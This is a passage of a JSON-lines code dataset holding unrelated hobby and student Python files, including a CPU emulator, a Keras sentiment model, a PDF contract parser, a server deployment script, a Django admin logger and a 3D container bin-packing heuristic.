self.data[int(reg)]\n\n def add(self, reg, data):\n self.data[int(reg)] += data\n self.data[int(reg)] = hex(self.data[int(reg)])\n\n def sub(self, reg, data):\n self.data[int(reg)] -= data\n self.data[int(reg)] = hex(self.data[int(reg)])\n\n\ndef main(mem_amount, vmem_amount, romfile): # Master (and monster) function\n print(\"Init registers\")\n regs = Registers(mem_amount, vmem_amount, 65535 - (mem_amount + vmem_amount)) # Initialize registers\n\n print(\"Init mem\", mem_amount)\n sys_mem = Memory(mem_amount) # Initialize RAM\n\n print(\"Init display\", vmem_amount)\n display = Display(vmem_amount) # Init display\n\n # Instruction function definitions\n def load(reg, dataH, dataL):\n full_data = emu_utils.concat_hex(dataH, dataL)\n regs.write(reg, full_data)\n\n def store(reg, addrH, addrL):\n full_addr = emu_utils.concat_hex(addrH, addrL)\n if full_addr <= mem_amount:\n sys_mem.write(full_addr, regs.read(reg))\n elif full_addr <= mem_amount + vmem_amount:\n display.set(regs.read(reg), full_addr - (mem_amount))\n elif full_addr <= (65535 - (mem_amount + vmem_amount)):\n print(\"ERROR: Cannot write to ROM\")\n\n def add(reg, reg2):\n regs.add(reg, regs.read(reg2))\n\n def sub(reg, reg2):\n regs.sub(reg, regs.read(reg2))\n\n def mov(reg, reg2):\n regs.write(reg2, regs.read(reg))\n regs.write(reg, 0x0000)\n\n def ifeq(reg, dataH, dataL):\n full_data = emu_utils.concat_hex(addrH, addrL)\n if regs.read(reg) == full_data:\n return True\n else:\n return False\n\n def neq(reg, dataH, dataL):\n if ifeq(reg, dataH, dataL):\n return False\n else:\n return True\n\n def noop():\n print(\"NOOP\")\n\n # Parser functions\n exec_line = True\n def parse_inst(inst, arg1, arg2, arg3):\n print(inst, arg1, arg2, arg3)\n if inst == 0x00:\n print(\"load\", arg1, arg2, arg3)\n load(arg1, arg2, arg3)\n elif inst == 0x10:\n print(\"store\", arg1, arg2, arg3)\n store(arg1, arg2, arg3)\n elif inst == 0x20:\n print(\"add\", arg1, arg3)\n add(arg1, arg3)\n elif inst == 0x30:\n print(\"sub\", arg1, arg3)\n sub(arg1, arg3)\n elif inst == 0x40:\n print(\"move\", arg1, arg3)\n mov(arg1, arg3)\n elif inst == 0x80:\n print(\"ifeq\", arg1, arg2, arg3)\n exec_line = ifeq(arg1, arg2, arg3)\n elif inst == 0x81:\n print(\"neq\", arg1, arg2, arg3)\n exec_line = neq(arg1, arg2, arg3)\n elif inst == 0xFF:\n print(\"System halt\")\n sys.exit()\n else:\n noop()\n\n def parse_rom(file):\n data = emu_utils.read_rom(file)\n i, j = 0, 0\n while True:\n i = j\n j += 4\n inst_ln = [0x00,0x00,0x00,0x00]\n while i < j:\n inst_ln.append(sys_mem.read(i))\n i += 1\n\n if exec_line == True:\n parse_inst(inst_ln[0], inst_ln[1], inst_ln[2], inst_ln[3])\n\n parse_rom(romfile)\n\nif __name__ == \"__main__\":\n args = sys.argv\n\n vmem = 8192\n mem = 24576\n\n if len(args) <= 1:\n print(\"Usage:\", args[0], \" [--mode 0|1|2|3|4]\")\n exit()\n\n romfile = args[1]\n\n if len(args) == 3:\n if args[3] == \"0\":\n vmem = 4096\n mem = 8192\n elif args[3] == \"1\":\n vmem = 8192\n mem = 8192\n elif args[3] == \"2\":\n vmem = 8192\n mem = 24576\n elif args[3] == \"3\":\n vmem = 16384\n mem = 32768\n elif args[3] == \"4\":\n vmem = 8192\n mem = 49152\n\n main(mem, vmem, romfile)\n","sub_path":"emu_main.py","file_name":"emu_main.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"26649190","text":"\"\"\"\nModel definition for CNN sentiment training\n\"\"\"\n\nimport os\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, Convolution1D, GlobalMaxPool1D\nimport tensorflow.keras as keras\nimport numpy as np\n\ndef keras_model_fn(_, config):\n \"\"\"\n Creating a CNN model for sentiment modeling\n \"\"\"\n\n embedding_matrix = read_dictionary('s3://ai-assignment/assignment6/glove.50d.txt',config[\"embeddings_dictionary_size\"],config[\"embeddings_vector_size\"])\n\n cnn_model = Sequential()\n cnn_model.add(Embedding(weights=[embedding_matrix], input_length = config[\"padding_size\"],input_dim = config[\"embeddings_dictionary_size\"],output_dim = config[\"embeddings_vector_size\"], trainable = True))\n cnn_model.add(Convolution1D(filters=200,kernel_size=3,strides = 1, padding='valid',activation = 'relu'))\n cnn_model.add(MaxPool1D(pool_size = 2))\n cnn_model.add(Convolution1D(filters=100,kernel_size=2,strides = 1, padding='valid',activation = 'relu'))\n cnn_model.add(GlobalMaxPool1D())\n cnn_model.add(Dense(units=100, activation = 'relu'))\n cnn_model.add(Dense(units=1, activation = 'sigmoid'))\n Adam = keras.optimizers.Adam(lr=0.005, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n cnn_model.compile(loss = 'binary_crossentropy', optimizer = 'Adam', metrics =['accuracy'])\n\n return cnn_model\n\ndef save_model(model, output):\n\n \"\"\"\n Method to save a model in SaveModel format with signature to allow for serving\n \"\"\"\n\n print(\"Saving model...\")\n\n tf.saved_model.save(model, os.path.join(output, \"1\"))\n\n print(\"Model successfully saved at: {}\".format(output))\n","sub_path":"model_training/sentiment_model_cnn.py","file_name":"sentiment_model_cnn.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551816482","text":"import re\nimport random\nimport os\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport tabula\nfrom IPython.display import HTML\n\ndef loadKeywords():\n with open('./data/keyword_fields.txt') as f:\n data = f.readlines()\n data.sort(key=len, reverse=True)\n field_regex = re.compile('|'.join([dt.replace('\\n', '') for dt in data if dt != '\\\\w+ #\\n']).replace(' ', '\\s'))\n return field_regex\n\ndef dateRegex():\n date_range_regex = re.compile(r'[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}\\s*-\\s*[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}')\n date_regex = re.compile(r'[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}')\n return date_regex, date_range_regex\n\ndef showPDF(filepath):\n return HTML('' % (filepath))\n\ndef doTabula(inputFile, nospreadsheet, guessArea=False, pages='all'):\n tabula.convert_into(inputFile, output_path='/tmp/convertedFCCFile.txt', output_format='csv', guess=guessArea, pages=pages, nospreadsheet=nospreadsheet)\n df = pd.read_csv('/tmp/convertedFCCFile.txt', names=range(0,7))\n return df\n\ndef readPdfToText(inputFile):\n os.system(\"pdftotext -layout '%s' '%s'\" % (inputFile, 'test.txt'))\n pdfContent = subprocess.check_output(\"pdftotext -layout '%s' '%s'\" % (inputFile, '-'), shell=True).decode()\n pdfLines = pdfContent.split('\\n')\n df_rows = []\n for line in pdfLines:\n field_lines = [field for field in re.split('\\s{2,}', line) if field != '']\n if len(field_lines) > 1:\n df_rows.append(field_lines)\n df = pd.DataFrame.from_records(df_rows)\n return df\n\ndef generateMatrixLookup(df, field_regex=loadKeywords()):\n valueMatrix = df.as_matrix()\n headerMatrix = df.applymap(lambda x: field_regex.findall(x) if type(x) == str else False).as_matrix()\n return headerMatrix, valueMatrix\n\ndef extractFields(headerMatrix, valueMatrix, extraction_method):\n extracted_fields = []\n (lx,ly) = headerMatrix.shape\n for x in range(0, lx):\n for y in range(0,ly):\n current_field = headerMatrix[x,y]\n if current_field:\n if extraction_method == 'medial' and x < lx-1:\n target_field = valueMatrix[x+1,y]\n elif extraction_method == 'lateral' and y < ly-1:\n target_field = valueMatrix[x,y+1]\n extracted_fields.append((current_field,target_field))\n return extracted_fields\n\ndef filterExtractedFields(extracted_fields, date_range_regex=dateRegex()[1], lazy=False):\n finalized_meta = {}\n for field, value in extracted_fields:\n if not pd.isnull(value):\n if field[0] == 'Contract / Revision' and not pd.isnull(value):\n finalized_meta['altOrder'] = value.split(' ')[0] if type(value) == str else value\n if field[0] in ['Contract Dates', 'Schedule Dates']:\n finalized_meta['flightDates'] = value\n if field[0] == 'Demographic':\n finalized_meta['Demographic'] = value\n if len(field) == 1 and field[0] == 'Advertiser':\n finalized_meta['Advertiser'] = value\n if len(field) == 1:\n if ' / ' in field[0]:\n finalized_meta.update(dict(zip(field[0].split(' / '), value.split(' / '))))\n if len(field) > 2:\n if 'Period' in field and 'Spots' in field:\n matched_date = date_range_regex.findall(value)[0]\n value = value.replace(matched_date, matched_date.replace(' ', ''))\n finalized_meta.update(dict(zip(field, value.split(' '))))\n #if field[2] == 'Gross Amount':\n # finalized_meta['total'] = value.split(' ')[-1]\n #finalized_meta[field]\n if lazy:\n if len(field) == 1 and not pd.isnull(value):\n finalized_meta[field[0].strip()] = value.strip()\n return finalized_meta\n\ndef layoutClassifier(inputFile):\n layout_regex = ['Print Date', 'Contract Agreement Between', 'Page .+ of .+', 'Remit To', 'CONTRACT NO']\n layout_meta = [\n {\n 'regex': 'Contract Agreement Between',\n 'nospreadsheet': False,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'medial'\n },\n {\n 'regex': 'Page .+ of .+',\n 'nospreadsheet': True,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'lateral'\n },\n {\n 'regex': 'Print Date',\n 'nospreadsheet': False,\n 'parser': 'pdfToText',\n 'lazy': True,\n 'extraction_method': 'lateral'\n },\n {\n 'regex': 'Remit To',\n 'nospreadsheet': False,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'lateral'\n }\n ]\n layout_types = [re.compile(str.encode(t['regex'])) for t in layout_meta]\n first_line = subprocess.check_output(\"pdftotext -l 1 '%s' '%s' | head -n1\" % (inputFile, '-'), shell=True)\n print(first_line)\n for pattern_index, pattern in enumerate(layout_types):\n if pattern.match(first_line):\n return layout_meta[pattern_index], pattern\n return None, None \n#lineMatch = re.compile(b'(Print Date)|(Contract Agreement Between)|(Page .+ of .+)|(Remit To)|(CONTRACT NO)|(Print Date)')\n#for file in scanFiles('./downloads'):\n# if '.pdf' in file:\n# first_line = subprocess.check_output(\"pdftotext -l 1 '%s' '%s' | head -n1\" % (file, '-'), shell=True)\n# if not lineMatch.match(first_line):\n# print(first_line)","sub_path":"pifParser.py","file_name":"pifParser.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"355950707","text":"'''program that calculates the minimum fixed monthly payment needed in order pay off a credit card balance within 12 months.\n'''\nbalance=3926\nannualInterestRate=0.2\nfixedmonthlypayment=0\nunpaid=balance-fixedmonthlypayment\nwhile unpaid>0:\n b=balance\n fixedmonthlypayment=fixedmonthlypayment+10\n for month in range(1,13):\n unpaid=b-fixedmonthlypayment\n Interest=(unpaid*annualInterestRate)/12\n b=unpaid+Interest\nprint(\"Lowest Payment: \"+str(fixedmonthlypayment))","sub_path":"scripts/inayear.py","file_name":"inayear.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244796540","text":"from multiprocessing import Process\nimport os\n\n\ndef setup(server):\n os.system('/usr/bin/rsync -aL --progress -e \"ssh -i ~/Research.pem\" ~/Current_Project/Main/ServerSetup/GPU_VM_Setup.sh ubuntu@' + server +':~/')\n os.system('ssh -i \"~/Research.pem\" ubuntu@' + server + ' \"bash GPU_VM_Setup.sh\"')\n os.system('/usr/bin/rsync -avLR -e \"ssh -i ~/Research.pem\" ~/./Current_Project/Main/*.py ubuntu@' + server +':~/')\n os.system('/usr/bin/rsync -avLR -e \"ssh -i ~/Research.pem\" ~/./Current_Project/Main/DB/TrainData/Train_*_ready.npz ubuntu@' + server +':~/')\n\n return\n\ndef Configure_Servers(servers):\n\n procs = []\n for server in servers:\n proc = Process(target=setup, name=server, args=(server,))\n procs.append(proc)\n proc.start()\n for proc in procs:\n proc.join()\n return\n\n\nif __name__ == '__main__':\n servers = ['ec2-18-219-47-209.us-east-2.compute.amazonaws.com']\n Configure_Servers(servers)\n\n\n\n\n","sub_path":"SolarForecast/ServerScript.py","file_name":"ServerScript.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281409174","text":"import os, sys\n\nfile_object = open(\"/Users/Zenith/Desktop/target.xml\", \"w\")\nsearch_text = \"src=\\\"http://www.zenitheos.com/wp-content/uploads/2014/04/\"\nreplace_text = \"src=\\\"http://www.zenitheos.com/wp-content/uploads/\"\n#input_file = sys.stdin\ninput_file = open(\"/Users/Zenith/Desktop/data.xml\")\noutput_file = sys.stdout\n\nfor s in input_file:\n #output_file.write(s.replace(search_text, replace_text))\n file_object.write(s.replace(search_text, replace_text))\n #file_object.close()\n\n#output_file.close()\n#file_object.close()\n#input_file.close()","sub_path":"editText.py","file_name":"editText.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201147698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 8 21:39:01 2016\n\n@author: jc\n\"\"\"\n\nimport Tkinter as tk\nimport sys\n\n## Définition des variables ---------------------------------------------------\nserverName = \"bord3l\"\nserverPort = 1883\n\n## ----------------------------------------------------------------------------\ndef publish(temp):\n # Connexion au broker mqtt\n mqttc = mosquitto.Client()\n mqttc.connect(serverName, serverPort)\n \n if len(temp) == 3:\n mqttc.publish(\"etudeje/NouvelOutil/\"+temp0+\"/genre\", temp1)\n mqttc.publish(\"etudeje/NouvelOutil/\"+temp0+\"/photo\", temp2)\n \n mqttc.loop(2)\n return 0\n \n\nclass Interface(tk.Frame):\n def __init__(self, root):\n tk.Frame.__init__(self, root)\n self.pack()\n \n # Création de la frame de boutons\n self.mainFrame = tk.LabelFrame(self)\n self.mainFrame.pack(side=\"left\")\n self.frame1 = tk.Frame(self.mainFrame)\n self.frame1.pack(expand='true', fill='x')\n self.frame2 = tk.Frame(self.mainFrame)\n self.frame2.pack(expand='true', fill='x')\n self.frame3 = tk.Frame(self.mainFrame)\n self.frame3.pack(expand='true', fill='x')\n self.frame4 = tk.Frame(self.mainFrame)\n self.frame4.pack(expand='true', fill='x')\n self.frame5 = tk.Frame(self.mainFrame)\n self.frame5.pack(expand='true', fill='x')\n \n # Cration des boutons\n \n # Nom de l'outil\n self.toolName = tk.StringVar()\n self.toolName.set('')\n tk.Label(self.frame1, text=\"Entrez le nom de l'outil\").pack(side=\"left\")\n tk.Entry(self.frame1, textvariable=self.toolName).pack(anchor='w')\n # Boite de dialogue pour la photo\n # Plutot upload de la photo\n \n # Bouton Scanner\n tk.Button(self.frame4, text='Lancer un scan', command=self.scan).pack(anchor='w')\n # Bouton enregistrer\n tk.Button(self, text=\"Enregistrer l'outil\", command=self.save).pack(anchor='w')\n # Bouton Quitter\n tk.Button(self.frame5, text='Quitter', command=self.quit).pack(anchor='w')\n \n def scan(self):\n # Checker les conditions avant de lancer un scan\n # Subprocess tout ca\n #if trop d'étiquettes ou pas d'étiquettes --> soucis\n return 0\n \n def save(self):\n # Upload de la photo\n toolName = self.toolName.get()\n etiquetteId = self.etiquetteId.get()\n photo = self.photo.get()\n publish([etiquetteId, toolName, photo])\n return 0\nif __name__ == '__main__':\n root = tk.Tk()\n inter = Interface(root)\n \n root.mainloop()\n sys.exit(0)\n ","sub_path":"ordinateur/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280313785","text":"from django.contrib.admin import ModelAdmin\nfrom django.contrib.auth.models import User\nfrom django.forms.models import model_to_dict\n\n\ndef diff_changes_model(obj_a, obj_b):\n klass = obj_a.__class__\n\n diff_map = {}\n\n if obj_a and not obj_b:\n return model_to_dict(obj_a)\n\n for field in klass._meta.fields:\n display = \"get_%s_display\"\n\n def default_func():\n return None\n\n val_a = (\n getattr(obj_a, display % field.name, default_func)() or\n getattr(obj_a, field.name, None)\n )\n val_b = (\n getattr(obj_b, display % field.name, default_func)() or\n getattr(obj_b, field.name, None)\n )\n\n if val_a != val_b:\n diff = u\"{0} --> {1}\".format(val_a, val_b)\n diff_map[field.name] = diff\n\n return diff_map\n\n\ndef construct_change_message(obj, formsets, add, dic_changes={}):\n \"\"\"\n Construct a JSON structure describing changes from a changed object.\n Translations are deactivated so that strings are stored untranslated.\n Translation happens later on LogEntry access.\n \"\"\"\n change_message = []\n if add:\n change_message.append({'added': dic_changes})\n elif obj:\n change_message.append({'changed': {'fields': dic_changes}})\n\n return change_message\n\n\ndef log_changes(request, obj_start, obj_end, add=True):\n obj_changes = u''\n\n modeladmin = ModelAdmin(User, ModelAdmin)\n if add:\n obj_changes = u'Objeto adicionado'\n modeladmin.log_addition(request, obj_end)\n else:\n obj_changes = diff_changes_model(obj_start, obj_end)\n\n modeladmin.log_change(request, obj_end, {'changed': obj_changes})\n return obj_changes\n\n\ndef log_changes_before_save(request, obj_end):\n klass = obj_end.__class__\n obj_start = klass.objects.filter(pk=obj_end.pk).first()\n add = not obj_start\n\n return log_changes(request, obj_start, obj_end, add=add)\n","sub_path":"logentry_admin/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"590057308","text":"import json\nfrom google.cloud import bigquery\nfrom modules import constants\nfrom jinja2 import Template\nfrom modules import validation\n\n# Construct a BigQuery client object.\nclient = bigquery.Client()\n\n\ndef run_bq_query(query):\n query_job = client.query(query)\n records = [dict(row) for row in query_job]\n data = json.loads(json.dumps((records)))\n return data\n\n\ndef get_deployment_info(address, chain):\n valid, data = validation.validate_bq_args(address, chain)\n if valid:\n query_template = Template(constants.SQL_DEPLOYMENT_INFORMATION)\n query = query_template.render(\n contract_address=address.lower(), chain=chain)\n data = run_bq_query(query)[0]\n\n return data\n\n\ndef get_deployed_contracts(address, chain):\n\n valid, data = validation.validate_bq_args(address, chain)\n print(valid, data)\n if valid:\n query_template = Template(constants.SQL_DEPLOYED_CONTRACTS)\n query = query_template.render(\n deployer_address=address.lower(), chain=chain)\n data = run_bq_query(query)\n\n return data\n","sub_path":"contract-parser-api/modules/bq.py","file_name":"bq.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381985486","text":"import numpy as np\nimport layer\n\nclass network_classifier():\n\n def __init__(self,n_neurons,n_layers,n_inputs):\n self.n_neurons = n_neurons\n self.n_layers = n_layers\n self.learning_rate = 0.0001\n def fit(self,X,Y):\n self.n_inputs = X.shape[1]\n self.labels = np.unique(Y) \n self.layers = [layer.layer(self.n_neurons,self.n_inputs)] + [layer.layer(self.n_neurons,self.n_neurons) for i in range(self.n_layers)] + [layer.layer(len(self.labels),self.n_neurons)]\n self.Y = np.zeros([Y.shape[0],len(self.labels)])\n for i in Y:\n self.Y[i][int(Y[i][0])] = 1\n \n \n def feed_forward(self,X):\n for layer in self.layers:\n X = layer.feed_forward(X)\n return X\n def error(self,X,Y):\n p = self.feed_forward(X)\n return 1/2 * sum((Y - p)**2)\n def relu_deriv(self,Z):\n return Z > 0\n def output_layer_errors(self,Y,A):\n return np.multiply((Y - A),relu_deriv(layer[-1].Z))\n def layer_N_errors(self,d,layer2,layer1):\n return np.multiply(np.dot(layer2.weights,d),relu_deriv(layer1.Z))\n\n def back_prop(self,Y,A):\n arr = []\n d = self.output_layer_errors(Y,A)\n arr.append(d)\n for i in range(len(layers)-2,-1,-1):\n d = self.layer_N_errors(self,d,self.layers[i+1],self.layers[i])\n arr.append(d)\n\n \nif __name__ == '__main__':\n\n n = network(10,10,10)\n X = np.random.randint(1,9,[10,10])\n Y = np.random.randint(1,9,[1,10])\n n.fit(X,Y)\n sample = np.random.randint(1,9,[10,10])\n print(n.feed_forward(sample))\n\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"376178976","text":"import flask\nimport flask_restful\nfrom flask_restful import reqparse\n\napp = flask.Flask(__name__)\napi = flask_restful.Api(app)\n\n\ndef multiply(x, y):\n return x * y\n\n\nclass HelloJustin(flask_restful.Resource):\n def get(self):\n parser = reqparse.RequestParser()\n\n parser.add_argument(\"param1\")\n parser.add_argument(\"param2\")\n args = parser.parse_args()\n\n param1 = args[\"param1\"]\n param2 = args[\"param2\"]\n\n if not param1 or not param2:\n return {\n \"state\": 0,\n \"response\": None\n }\n\n param1 = int(param1)\n param2 = int(param2)\n\n result = multiply(param1, param2)\n return {\n \"state\": 1,\n \"response\": result\n }\n\n\napi.add_resource(HelloJustin, \"/api/multiply\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"py-basic-programming/tdd/using_flask/api/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323685847","text":"\n# coding: utf-8\n\n\nimport random\nimport numpy as np\nfrom math import *\nimport pandas as pd\nimport xlwt\nimport time\nimport multiprocessing\nimport copy\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\nbest_individ = [] \nbest_fit = 0\nL = W = H = 0\n\nclass coord:\n def __init__(self, x, y, z): \n self.x = x\n self.y = y\n self.z = z\n def get_coordinates(self):\n return (self.x, self.y, self.x)\n \n def __eq__(self,other):\n if type(other) is type(self):\n return self.__dict__ == other.__dict__\n return False\n \n def __hash__(self):\n return hash(tuple(sorted(self.__dict__.items())))\n \n def __repr__(self):\n return (\"\\n\\t x: {},\"\n + \"\\n\\t y: {},\"\n + \"\\n\\t z: {}\").format(self.x, self.y, self.z)\n \nclass item:\n def __init__(self, id, length, width, height):\n self.id = id\n self.l = length\n self.w = width\n self.h = height\n self.volume = length * width * height\n self.position = coord(0,0,0)\n self.rotation = 0\n self.new_l = length\n self.new_w = width\n self.new_h = height\n\n \n def __repr__(self):\n return (\"\\n Cont.L or position.y + item.new_w > Cont.W or position.z + item.new_h > Cont.H:\n rotation+=1\n flag = 1\n \n else: \n if Cont.PI:\n if position.z == 0:\n for pack_it in Cont.PI:\n if pack_it.position.z == 0: \n if pack_it.position.x > position.x and pack_it.position.x < position.x + item.new_l:\n if pack_it.position.y + pack_it.new_w > position.y:\n rotation+=1\n flag = 1\n \n\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if pack_it.position.x + pack_it.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.x + item.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n\n else:\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y and position.y <= pack_it.position.y or position.y > pack_it.position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n if pack_it.position.x > position.x and position.x + item.new_l > pack_it.position.x:\n if position.y < pack_it.position.y + pack_it.new_w and position.y >= pack_it.position.y or position.y < pack_it.position.y and pack_it.position.y < position.y+item.new_w:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1 \n flag = 1\n\n if pack_it.position.y + pack_it.new_w > position.y and position.y > pack_it.position.y:\n if position.x <= pack_it.position.x and position.x + item.new_l > pack_it.position.x or position.x > pack_it.position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n if pack_it.position.y < position.y + item.new_w and position.y < pack_it.position.y:\n if position.x >= pack_it.position.x and pack_it.position.x + pack_it.new_l > position.x or position.x < pack_it.position.x and position.x + item.new_l > pack_it.position.x:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n\n else: #if position.z > 0\n for pack_it in Cont.PI:\n if pack_it.position.z + pack_it.new_h > position.z and pack_it.position.z < position.z:\n\n if pack_it.position.y == position.y or pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y or pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if position.x + item.new_l > pack_it.position.x and position.x < pack_it.position.x:\n rotation+=1\n flag = 1\n\n if pack_it.position.x == position.x or pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x or pack_it.position.x > position.x and position.x + item.new_l > pack_it.position.x:\n if position.y + item.new_w > pack_it.position.y and position.y < pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.z == position.z:# объединить с первым условием\n if pack_it.position.x > position.x and pack_it.position.x < position.x + item.new_l:\n if pack_it.position.y + pack_it.new_w > position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if pack_it.position.x + pack_it.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.x + item.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if flag == 0:\n if position.z == 0:\n item.rotation = rotation\n return 1\n for i in Cont.PI:\n if i.position.z + i.h == position.z and i.position.x == position.x and i.position.y == position.y:\n if position.x + item.new_l > 1.3*(i.position.x+i.new_l) or position.y + item.new_w > 1.3*(i.position.y+i.new_w):\n rotation+=1\n flag = 1\n break\n if i.position.z + i.h == position.z:\n if i.position.x > position.x and i.position.x < position.x + item.new_l:\n if position.x + item.new_l > 1.3*(i.position.x + i.l):\n rotation+=1\n flag = 1\n break\n if i.position.x < position.x and i.position.x + i.l > position.x:\n if position.x + item.l > 1.3*(i.position.x + i.l - position.x):\n rotation+=1\n flag = 1\n break\n if i.position.y > position.y and i.position.y < position.y + item.new_w:\n if position.y + item.new_w > 1.3*(i.position.y + i.w):\n rotation+=1\n flag = 1\n break\n if i.position.y < position.y and i.position.y + i.w > position.y:\n if position.y + item.w > 1.3*(i.position.y + i.w - position.y):\n rotation+=1\n flag = 1\n break\n \n if flag == 0:\n item.rotation = rotation \n return 1\n return 0\n\ndef DBLF(Cont, item): \n Cont.PP = sorted(Cont.PP, key = lambda pos: (pos.x, pos.z, pos.y))\n for position in Cont.PP:\n if check(position, item, Cont):\n item.position = position\n Cont.PI.append(item) \n Cont.UP.append(position)\n update_lict_C (Cont, item)\n return 1\n return 0\n\n\ndef update_lict_C (Cont, item): \n MPL = 0\n for pi in Cont.PI:\n if MPL < pi.position.x + pi.new_l:\n MPL = pi.position.x + pi.new_l\n \n MP_x = MP_y = 0\n if item.position.z == 0:\n if coord(item.position.x + item.new_l, item.position.y, 0) not in Cont.UP:\n Cont.PP.append(coord(item.position.x + item.new_l, item.position.y, 0))\n if coord(item.position.x, item.position.y + item.new_w, 0) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y + item.new_w, 0))\n \n else:\n for pi in Cont.PI:\n if pi.position.x < item.position.x + item.new_l and pi.position.y < item.position.y + item.new_w\\\n\t\tand pi.position.x + pi.new_l > item.position.x + item.new_l and pi.position.y + pi.new_w > item.position.y:\n if pi.position.z + pi.new_h <= item.position.z and pi.position.z + pi.new_h > MP_x:\n MP_x = pi.position.z + pi.new_h\n if pi.position.x < item.position.x + item.new_l and pi.position.y < item.position.y + item.new_w\\\n\t\tand pi.position.x + pi.new_l > item.position.x and pi.position.y + pi.new_w > item.position.y + item.new_w:\n if pi.position.z + pi.new_h <= item.position.z and pi.position.z + pi.new_h > MP_y:\n MP_y = pi.position.z + pi.new_h\n break\n if coord(item.position.x + item.new_l, item.position.y , MP_x) not in Cont.UP:\n Cont.PP.append(coord(item.position.x + item.new_l, item.position.y , MP_x))\n if coord(item.position.x, item.position.y + item.new_w, MP_y) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y + item.new_w, MP_y))\n if coord(item.position.x, item.position.y, item.position.z + item.new_h) not in Cont.UP:\n Cont.PP.append(coord(item.position.x, item.position.y, item.position.z + item.new_h))\n if item.position.x + item.new_l > MPL:\n if coord(MPL, 0, 0) in Cont.PP:\n Cont.PP.remove(coord(MPL, 0, 0))\n MPL = item.position.x + item.new_l\n if coord(MPL, 0, 0) not in Cont.UP:\n Cont.PP.append(coord(MPL, 0, 0))\n \n Cont.PP = list(set(Cont.PP))\n if item.position in Cont.PP:\n Cont.PP.remove(item.position) \n for pp in Cont.PP:\n if pp.x == Cont.L or pp.y == Cont.W or pp.z == Cont.H:\n Cont.PP.remove(pp)\n \n\ndef LLSF(list_C, IP):\n global L, W, H\n solution = list_C.copy()\n for i in IP:\n solution = sorted(solution, key = lambda pos: (pos.left_space), reverse = True)\n for box in solution:\n flag = 0\n if box.left_space - i.volume >=0:\n if DBLF(box, i):\n box.left_space = box.left_space - i.volume\n flag = 1\n break\n if flag == 0:\n new_box = container(len(solution),L,W,H)\n DBLF(new_box, i)\n new_box.left_space = new_box.left_space - i.volume\n solution.append(new_box) \n return solution \n\n\ndef export_solution(solution,filename,info):\n solution_table = pd.DataFrame([], columns=['Номер контейнера', 'Номер объекта', 'x', 'y', 'z',\n 'l','w','h','Поворот', 'new l', 'new w', 'new h'])\n \n \n for fill_cont in solution: \n for item in 